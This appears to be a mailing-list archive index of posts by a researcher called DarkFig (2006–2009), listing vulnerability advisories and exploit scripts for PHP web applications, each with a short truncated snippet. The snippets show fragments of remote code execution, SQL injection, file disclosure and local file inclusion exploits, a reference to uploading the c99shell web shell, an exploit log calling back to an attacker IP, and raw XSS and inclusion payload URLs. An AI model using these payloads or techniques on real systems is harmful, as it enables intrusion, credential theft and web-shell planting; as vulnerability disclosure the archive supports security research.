phpslash <= 0.8.1.1 Remote Code Execution Exploit

2009-02-04 Thread gmdarkfig
{ if( $exit ) usage(); return true; } } } if( $exit ) usage();

Re: [Advisory] Invision Power Board <= 2.3.5 Multiple Vulnerabilities and Security Bypass

2008-08-30 Thread gmdarkfig
Update: Versions 2.2.x are also affected to the SQL Injection issue. A patch is available from http://forums.invisionpower.com/index.php?showtopic=276512. They just corrected the SQL Injection vulnerability. All versions are still affected to the other issues.

Re: [Exploit] Invision Power Board <= 2.3.5 Multiple Vulnerabilities

2008-08-29 Thread gmdarkfig
Several changes were made. * IDS Evasion feature added (%0D) * You need the phpsploit class version >= 2.1 The newest version is available from : http://acid-root.new.fr/?1:35

[Exploit] Invision Power Board <= 2.3.5 Multiple Vulnerabilities

2008-08-29 Thread gmdarkfig
D ASCII(SUBSTR('.$this->t_field. ','.$this->sub_chr.',1))='.$asc.' '.$this->t_add_0; } else {

[Advisory] Invision Power Board <= 2.3.5 Multiple Vulnerabilities and Security Bypass

2008-08-29 Thread gmdarkfig
Title: Invision Power Board <= 2.3.5 Multiple Vulnerabilities and Security Bypass Vendor: http://www.invisionpower.com/community/board/ Advisory: http://acid-root.new.fr/?0:18 Author: DarkFig < gmdarkfig (at) gmail (dot) com > Re

VHCS <= 2.4.7.1 (vhcs2_daemon) Remote Root Exploit

2008-03-10 Thread gmdarkfig
#!/usr/bin/php -q http://localhost/vhcs2/ # # VHCS <= 2.4.7.1 (vhcs2_daemon) Remote Root Exploit # -- # # About: # by DarkFig < gmdarkfig (at) gmail (dot) com > # http://acid-root.new.fr/ # [EMAIL PROTECTED] #

Belkin Wireless G Plus MIMO Router F5D9230-4 Authentication Bypass Vulnerability

2008-01-21 Thread gmdarkfig
## ## VULNERABILITY: ## ## Belkin Wireless G Plus MIMO Router F5D9230-4 ## Authentication Bypass Vulnerability ## ## ## AUTHOR: ## ## DarkFig < gmdarkfig (at) gmail (dot) com > ## http://acid-root.new.fr/?0:17 ## [EMAIL PROTECTED] ## ## ## INTRODUCTION: ## ## I re

PHP Security Framework: Vuln and Security Bypass

2007-12-17 Thread gmdarkfig
Title: PHP Security Framework (Beta 1) Multiple Vulnerabilities and Security Bypass Vendor: http://benjilenoob.66ghz.com/projects/ Advisory: http://acid-root.new.fr/?0:16 Author: DarkFig < gmdarkfig (at) gmail (dot) com > Released on:

JBC Explorer <= V7.20 RC 1 Remote Code Execution Exploit

2007-11-05 Thread gmdarkfig
#!/usr/bin/php agent('Mozilla Firefox'); $xpl->allowredirection(1); $xpl->cookiejar(1); if($prx) $xpl->proxy($prx); if($pra) $xpl->proxyauth($pra); print "0x01>Deleting the file auth.inc.php"; $xpl->post($url.'dirsys/modules/auth.php', 'suppr=1'); print "\n0x02>Creating the file auth.inc

Simple PHP Blog (sphpblog) <= 0.5.1 Multiple Vulnerabilities

2007-10-22 Thread gmdarkfig
Title: Simple PHP Blog (sphpblog) <= 0.5.1 Multiple Vulnerabilities Vendor: http://sourceforge.net/projects/sphpblog/ Advisory: http://acid-root.new.fr/?0:15 Author: DarkFig < gmdarkfig (at) gmail (dot) com > Released on: 2007/10/21

Re: [waraxe-2007-SA#053] - Critical Sql Injection in NukeSentinel 2.5.11

2007-09-28 Thread gmdarkfig
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5125 Same as mine: http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1171 [me] # +nsbypass.php # 16. $tid = intval($tid); # 17. if(isset($_COOKIE['admin']) && !empty($_COOKIE['admin'])) { # 18. $abadmin = base64_decode($_COOKIE['admin']); # 19. $abadmin = ex

Pluxml 0.3.1 Remote Code Execution Exploit

2007-06-25 Thread gmdarkfig
sploit.php -url http://victim.com/pluxml0.3.1/ -ip 90.27.10.196 # [/]Waiting for connection on http://90.27.10.196:80/ # [!]Now you have to make the victim to click on the url # [+]Received 395 bytes from 182.26.54.2:2007 # [+]Sending 366 bytes to 182.26.54.2:2007 # [+]Received 326 bytes from 182.

Re: Re: PHP parse_str() arbitrary variable overwrite

2007-06-13 Thread gmdarkfig
You're all right. I added your replies in the advisory (if you want that I retire them, feel free to contact me).

PHP parse_str() arbitrary variable overwrite

2007-06-12 Thread gmdarkfig
Title:PHP parse_str() arbitrary variable overwrite Vendor:http://www.php.net/ Advisory:http://www.acid-root.new.fr/advisories/14070612.txt Author:DarkFig < gmdarkfig (at) gmail (dot) com > Written on:2007/06/12 Released on:2007/06/12 Risk

Nuked-klaN 1.7.6 Remote Code Execution Exploit

2007-05-05 Thread gmdarkfig
# Website: http://www.acid-root.new.fr/ # PHP conditions: None =] # Private since 2 months. # error_reporting(E_ALL ^ E_NOTICE); # This file require the PhpSploit class. require("phpsploitclass.php"); # If you want to use this class, the latest # version can

PunBB <= 1.2.14 Remote Code Execution (Exploit)

2007-04-11 Thread gmdarkfig
#!/usr/bin/php URL: http://www.acid-root.new.fr/ --- Usage: $argv[0] -url <> -usr <> -pwd <> [Options] Params: -url For example http://victim.com/punBB/ -usr User account (1 post at least)

PunBB <= 1.2.14 Multiple Vulnerabilities (Advisory)

2007-04-11 Thread gmdarkfig
Title:PunBB <= 1.2.14 Multiple Vulnerabilities Author:DarkFig < gmdarkfig (at) gmail (dot) com > Written on:2007/04/08 Released on:2007/04/11 Risk level:High URL:http://www.acid-root.new.fr/advisories/13070411.txt Summary:SQL

MyBulletinBoard (MyBB) <= 1.2.3 Remote Code Execution Exploit

2007-04-03 Thread gmdarkfig
#!/usr/bin/php http://www.milw0rm.com/exploits/2012 # They corrected (not all) a lot of SQL requests which use the ipaddress, with $db->escape_string. # They don't corrected the function (this is a choice ... the bad) and they forgot to correct 1 (only) SQL request. # They must correct the proble

Net Portal Dynamic System (NPDS) <= 5.10 Remote Code Execution 0day

2007-03-19 Thread gmdarkfig
#!/usr/bin/php http://www.acid-root.new.fr \/ [EMAIL PROTECTED] NOTE | Works regardless of php settings USAGE | $argv[0] -url [Options] OPTIONS | -proxy If you wanna use a proxy | -proxyauth Basic authentification ");exit(1); } $url = getparam('url',1); $pro = getparam('proxy'

NukeSentinel <= 2.5.06 SQL Injection (mysql >= 4.0.24) Exploit

2007-03-11 Thread gmdarkfig
#!/usr/bin/php = 4.0.24) Exploit --- --- PHP conditions: none CMS conditions: disable_switch<=0 (module activated), track_active=1 Credits: DarkFig <[EMAIL PROTECTED]> URL: http://www.acid-root.new.fr/ --

webSPELL <= 4.01.02 Remote PHP Code Execution Exploit

2007-03-03 Thread gmdarkfig
#!/usr/bin/php http://localhost/webspell4.01.02/downloads/c99shell.php) # if($argc < 5) { print (" -- webSPELL <= 4.01.02 Remote PHP Code Execution Exploit -- --- PHP conditions: register_globals=On Credits: Dark

Connectix Boards <= 0.7 (p_skin) Multiple Vulnerabilities Exploit

2007-02-22 Thread gmdarkfig
#!/usr/bin/php URL: http://www.acid-root.new.fr/ --- Usage: $argv[0] -url <> -usr <> -pwd <> -type <> [Options] Params: -url For example http://victim.com/connectix/ -usr The username of your accoun

NukeSentinel 2.5.05 (nsbypass.php) Blind SQL Injection Exploit

2007-02-20 Thread gmdarkfig
#!/usr/bin/php URL: http://www.acid-root.new.fr/ Support us: Just click once on our publicity ;) -- Usage: $argv[0] -url -victim [Opts] Options: -isadmin Is the victim an Admin (1) or a normal user (default=0) ?

NukeSentinel 2.5.05 (nukesentinel.php) File Disclosure Exploit

2007-02-20 Thread gmdarkfig
#!/usr/bin/php File Disclosure # Maybe work on other versions. # Interesting exploit =) # if($argc < 5) { print(" NukeSentinel 2.5.05 (nukesentinel.php) File Disclosure Exploit -- PHP conditions: none CMS conditions: disable_switch<

Re: Jupiter CMS 1.1.5 Multiple Vulnerabilities

2007-02-14 Thread gmdarkfig
Little error for the file upload vulnerability. Updated, see http://www.acid-root.new.fr/advisories/12070214.txt. Sorry for the inconvenience :(. "An attacker can access to this script, simply by sending a request which not contains the "is_guest" and "is_user" variables."

Jupiter CMS 1.1.5 Multiple Vulnerabilities

2007-02-14 Thread gmdarkfig
Title:Jupiter CMS 1.1.5 Multiple Vulnerabilities Advisory ID:12070214 Risk level:High Author:DarkFig <[EMAIL PROTECTED]> URL:http://www.acid-root.new.fr/advisories/12070214.txt .: [ OVERVIEW ] Jupiter CMS 1.1.5 is a powerful user-friendly Community

Re: mcRefer SQL injection

2007-02-12 Thread gmdarkfig
This is not an SQL Injection. The script don't use any SQL database, please tell me where is the sql request =). However the install.php script can lead to php code execution (works regardless of php.ini settings). Proof of concept: - #!/usr/bin/php $cod = "print(poc)"; $xpl = new phpsploit

Aztek Forum 4.1 Multiple Vulnerabilities Exploit

2007-01-25 Thread gmdarkfig
#!/usr/bin/php = 1.2 error_reporting(E_ALL ^ E_NOTICE); /* header> Aztek Forum 4.1 Multiple Vulnerabilities Exploit header> === sploit> Owner -> root status> Trying to register a new user sploit> Login/Password -> phpsploit8435 status> Trying t

Re: Aztek Forum 4.1 Multiple Vulnerabilities Exploit

2007-01-25 Thread gmdarkfig
Little error: Last version is 4.00. Updated, sorry for the inconvenience.

@lex Guestbook <= 4.0.2 Remote Command Execution Exploit

2007-01-08 Thread gmdarkfig
#!/usr/bin/php @lex Guestbook <= 4.0.2 Remote Command Execution Exploit | header> | status> Retrieving the administrator password | sploit> AdminUsername::root | sploit> AdminPassword::toor | status> Trying to get logged in | sploit> D

Coppermine Photo Gallery <= 1.4.10 SQL Injection Exploit

2007-01-05 Thread gmdarkfig
#!/usr/bin/php "; print "\nProxyOptions..: "; print "\nExample...: php xpl.php http://c.com/ admin passwd"; print "\n-\n"; exit(1); } /*/ [0] => xpl.php [1] => http://localhost/cpg1410/ [2]

Simple Web Content Management System SQL Injection Exploit

2007-01-03 Thread gmdarkfig
#!/usr/bin/php Options...: Example...: php xpl.txt http://hihi.org/ /etc/passwd \n"); exit(1); } $url =$argv[1];$file =$argv[2]; $proxh=$argv[3];$proxa=$argv[4]; $xpl = new phpsploit(); $xpl->agent("Mozilla"); if($proxh) $xp

Cahier de texte V2.2 Bypass general access protection exploit

2006-12-26 Thread gmdarkfig
'Administrateur') { header("Location: ../index.php");} ;} else { header("Location: ../index.php");}?> ... */ if(!isset($_GET['host']) || empty($_GET['host'])) headers(); if(!isset($_GET['wanted'])) $wanted = 'index.php'; $host = $_GET['host']; $prox = $_GET['prox']; $path = $_GET['path']; e

Ixprim CMS 1.2 Remote Blind SQL Injection Exploit

2006-12-21 Thread gmdarkfig
#!/usr/bin/perl # # INFORMATIONS # # Affected.scr..: Ixprim 1.2 # Poc.ID: 16061221 # Type..: Blind SQL Injection # Risk.level: Medium # Conditions: load_file privilege (ixp code only) # Src.download..: www.ixprim-cms.org # Poc.link..: acid-root.new.fr/poc/16

Cahier de texte V2.0 SQL Code Execution Exploit

2006-11-24 Thread gmdarkfig
#!/usr/bin/perl # # # INFORMATIONS # # Affected.scr..: Cahier de texte V2.0 # Poc.ID: 15061124 # Type..: Predictable backup filename, Source disclosure # Risk.level: High # Conditions: register_globals = on # Src.download..: www.etab.ac-caen.fr/bsauveur/cahier_d

Re: A-Cart PRO SQL Injection

2006-11-18 Thread gmdarkfig
Already posted here http://s-a-p.ca/index.php?page=OurAdvisories&id=27

Re: [Aria-Security's Research Team] ActiveNews Manager SQL Injection Vulnerabilite

2006-11-18 Thread gmdarkfig
Already posted here (2006-11-14 17:10:35) http://s-a-p.ca/index.php?page=OurAdvisories&id=31. Stop copying them!!

Oxygen <= 1.1.3 (O2PHP Bulletin Board) SQL Injection

2006-11-18 Thread gmdarkfig
#!/usr/bin/php ---\n"); exit(1); } print "\n Please be patient (max=736 hits)...\n MD5: "; $host = !preg_match("/^http:\/\/(\S*)/",$argv[1],$hwttp) ? $argv[1] : $hwttp[1]; $path = $argv[2]; $usid = intval($argv[3]); $tabl = "o2_members"; fo

7 php scripts File Inclusion / Source disclosure Vuln

2006-10-10 Thread gmdarkfig
# # Title..: 7 php scripts File Inclusion Vuln / Source disclosure # Credits: DarkFig # Og.link: http://acid-root.new.fr/poc/13061007.txt # # Using http://www.google.com/codesearch # Few examples about what we can do with a code search engine # For educational purpose only. # # You can use regex in

Blog Pixel Motion V2.1.1 PHP Code Execution / Create Admin Exploit

2006-09-27 Thread gmdarkfig
#!/usr/bin/perl # # Affected.scr..: Blog Pixel Motion V2.1.1 # Poc.ID: 12060927 # Type..: PHP Code Execution (stripslashes), SQL Injection (urldecode) # Risk.level: High # Vendor.Status.: Unpatched # Src.download..: www.pixelmotion.org/zip/blog2.1.zip # Poc.link..: a

Re: Re: mysql_error() can lead to Cross Site Scripting attacks

2006-09-22 Thread gmdarkfig
Sorry for the little error, *Unpatched. Just imagine, you have a limited access (sql command are filtered for example) to an sql injection, you don't know the source code of the php script. You can't do anything with the sql injection, all your attempts conduct to an error returned to client.

mysql_error() can lead to Cross Site Scripting attacks

2006-09-20 Thread gmdarkfig
esponse from PHP Team. ==[ TIMELINE 06. Sept. 2006 - Vendor contacted 20. Sept. 2006 - Public disclosure ==[ CONTACT === Author: DarkFig Web...: www.acid-root.new.fr E-mail: gmdarkfig[*]gmail[*]com (fr/en) Note: Tested on 4.4.3

SoftBB 0.1 Remote PHP Code Execution Exploit

2006-09-04 Thread gmdarkfig
#!/usr/bin/perl # # Affected.scr..: SoftBB 0.1 # Poc.ID: 11060904 # Type..: PHP code execution, SQL Injection, Full Path Disclosure # Risk.level: High # Vendor.Status.: Unpatched # Src.download..: softbb.be # Poc.link..: acid-root.new.fr/poc/11060904.txt # Advisory.

Tr Forum V2.0 Multiple Vulnerabilities

2006-09-04 Thread gmdarkfig
#!/usr/bin/perl # # Affected.scr..: Tr Forum V2.0 # Poc.ID: 10060903 # Type..: SQL Injection, Bypass Security Restriction # Risk.level: Medium # Vendor.Status.: Unpatched # Src.download..: comscripts.com/scripts/php.tr-forum.1579.html # Poc.link..: acid-root.new.fr/p

Annuaire 1Two 2.2 Remote SQL Injection Exploit

2006-09-02 Thread gmdarkfig
#!/usr/bin/perl # # Affected.scr..: Annuaire 1Two 2.2 # Poc.ID: 09060902.txt # Type..: SQL Injection (without quote) # Risk.level: Medium # Vendor.Status.: Unpatched # Src.download..: http://www.1two.org/ # Poc.link..: acid-root.new.fr/poc/09060902.txt # Credits

forum v0.4c (members.dat) MD5 Passwd Hash Disclosure Poc

2006-09-02 Thread gmdarkfig
#!/usr/bin/perl # # Affected.scr..: µforum v0.4c # Poc.ID: 08060901 # Type..: Member's passwords are stored in .dat file no protected by a .htaccess file # Risk.level: Medium # Vendor.Status.: Unpatched # Src.download..: comscripts.com/scripts/php.forum.1568.html # Poc.

Membrepass v1.5 Php code execution, Xss, Sql Injection

2006-08-31 Thread gmdarkfig
verified. ==[ TIMELINE 29. Aug. 2006 - Public Disclosure ==[ CONTACT === Author: DarkFig Web...: www.acid-root.new.fr E-mail: gmdarkfig[*]gmail[*]com (fr/en)

ezContents Version 2.0.3 Remote/Local File Inclusion, SQL Injection, XSS

2006-08-30 Thread gmdarkfig
# # VulnScr: ezContents Version 2.0.3 # Web: http://www.ezcontents.org/ # # Date...: Web July 28 10:44 2006 # Credits: DarkFig ([EMAIL PROTECTED]) # Vuln...: SQL Injection, Remote/Local File Inclusion, Cross Site Scripting # ==[ Remote / Local File Inclusion ==

boastMachine <= 3.1 SQL Injection Exploit

2006-07-17 Thread gmdarkfig
#!/usr/bin/perl # # VulnScr: boastMachine version 3.1 and prior # Web: http://boastology.com/ # # Date: Sun July 16 10:43 PM 2006 # Credits: DarkFig ([EMAIL PROTECTED]) # Vuln: SQL Injection, Cross Site Scripting, Cross Site Request Forgery, Predictable Backup Filename

5 php scripts remote database password disclosure

2006-07-03 Thread gmdarkfig
# # Title: 5 php scripts remote database password disclosure # Date: Sun July 02 21:04 2006 # Credits: Security hole discovered by DarkFig ([EMAIL PROTECTED]) # Problem: Database configuration is located in a .inc file(no protected by .htaccess file) # Web: http://acid-root

SturGeoN Upload v1 Remote Command Execution Exploit

2006-07-01 Thread gmdarkfig
#!/usr/bin/perl # # VulnScr: SturGeoN Upload v1 #Author: Jihad BENABRA # Download: http://rapidshare.de/files/24622338/2012_sturgeon-1.rar.html # WTF?: http://www.comscripts.com/scripts/php.sturgeon-upload.2012.html # # Date: Sat July 1 10:04 2006 # Credits: Vuln and Xpl

News <= 5.2 XSS, SQL Injection, Full Path Disclosure

2006-07-01 Thread gmdarkfig
#!/usr/bin/perl # # VulnScr: News version 5.2 and prior #E-mail: [EMAIL PROTECTED] # Web: www.vincent-leclercq.com # # Date: Thu June 29 12:01 2006 # Credits: DarkFig ([EMAIL PROTECTED]) # Vuln: XSS, Full Path Disclosure, SQL Injection # Advisorie: http://www.acid-r

vuBB <= 0.2.1 [BFA] SQL Injection Exploit + Advisory link

2006-06-19 Thread gmdarkfig
#!/usr/bin/perl # # by DarkFig -- acid-root.new.fr # French Advisory (vuBB <= 0.2.1 [BFA] SQL Injection, XSS, CRLF Injection, Full Path Disclosure): http://www.acid-root.new.fr/advisories/vubb021b.txt # use IO::Socket; use LWP::Simple; # Header print "\r\n+---

PhpMyFactures 1.0 Cross Site Scripting, SQL Injection, Full Path Disclosure and others

2006-06-13 Thread gmdarkfig
PhpMyFactures 1.0 * Full Path Disclosure [Guest] http://[...]/verif.php [Guest] http://[...]/inc/footer.php [Guest] http://[...]/remises/ajouter_remise.php Informations modification * [Guest] http://[...]/tva/ajouter_tva.

CS-Forum <= 0.81 Cross Site Scripting, SQL Injection, Full Path Disclosure

2006-06-12 Thread gmdarkfig
Cross Site Scripting http://[...]/read.php?msg_result=[XSS] http://[...]/read.php?rep_titre=";>[XSS] Cookies: CSForum_nom=">[XSS]; CSForum_mail=">[XSS]; CSForum_url=">[XSS] SQL Injection * http://[...]/read.php?id=1'[SQL_SELECT]&debut=[SQL_LIMIT] http://[..

NPDS <= 5.10 Local Inclusion, XSS, Full path disclosure

2006-06-08 Thread gmdarkfig
// Script Web www.npds.org versions --- NPDS <= 5.10 Solutions -- None official Note --- Vendor has been contacted // Local Inclusion http://[...]/header.php?Default_Theme=../apache/logs/error.log%00 http://[...]/modules/cluster-paradise/cluster-E.php?ModPath=../../../../../apa

Dmx Forum <= v2.1a Remote Passwords Disclosure

2006-06-05 Thread gmdarkfig
#!/usr/bin/perl # # by DarkFig -- www.acid-root.new.fr # use LWP::Simple; if ( !$ARGV[1] ) { header(); print "\n| Usage: |"; print "\n+--+"; print "\n| Example: http://localhost/dmx/ 1 --|"; end(); } sub header { print "

Critical SQL Injection in CoolForum

2006-06-04 Thread gmdarkfig
Type: SQL Injection Risk: Critical Product: CoolForum <= 0.8.3 beta Vulnerability * // File: editpost.php // Line 38 // if(isset($_REQUEST['post'])) $post = intval($_REQUEST['post']); else $post = 0; -- // Line 77 // $canedit = getrighted